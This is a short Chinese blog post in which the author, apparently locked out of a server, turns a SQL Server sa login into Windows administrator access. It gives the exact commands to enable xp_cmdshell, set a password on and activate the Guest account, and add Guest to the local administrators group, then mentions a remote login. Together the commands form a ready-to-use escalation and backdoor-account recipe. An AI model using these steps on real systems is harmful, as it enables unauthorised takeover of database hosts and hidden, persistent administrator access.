遇到小人,把服務器整走了
自己手里只有sql server的sa賬號密碼
模糊記起之前用這個賬戶提權讀取文件的事
百度之,發現相關信息一堆堆
各種工具也用了不少 發現不是語法錯誤就是權限不夠
無奈之下裝了sql server r2直接來操作
順利連接上去,看到有master這個庫。
直奔重點去
這里要用到的就是xp_cmdshell這個存儲過程,算是mssql有sa權限下的提權利器,不過有經驗的管理員一般都會用各種牛逼的方法去禁止普通用戶使用它
嘗試用正常的方法打開xp_cmdshell:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; exec sp_configure
看來運氣還是不錯滴,xp_cmdshell順利打開了。然后就可以直接執行cmd命令了:
exec xp_cmdshell ' net user Guest Qwer123456789' exec xp_cmdshell ' net user Guest /active:yes' exec xp_cmdshell 'net localgroup administrators Guest /add'
算是順利
沒什么障礙
最后附上一張遠程登錄的截圖
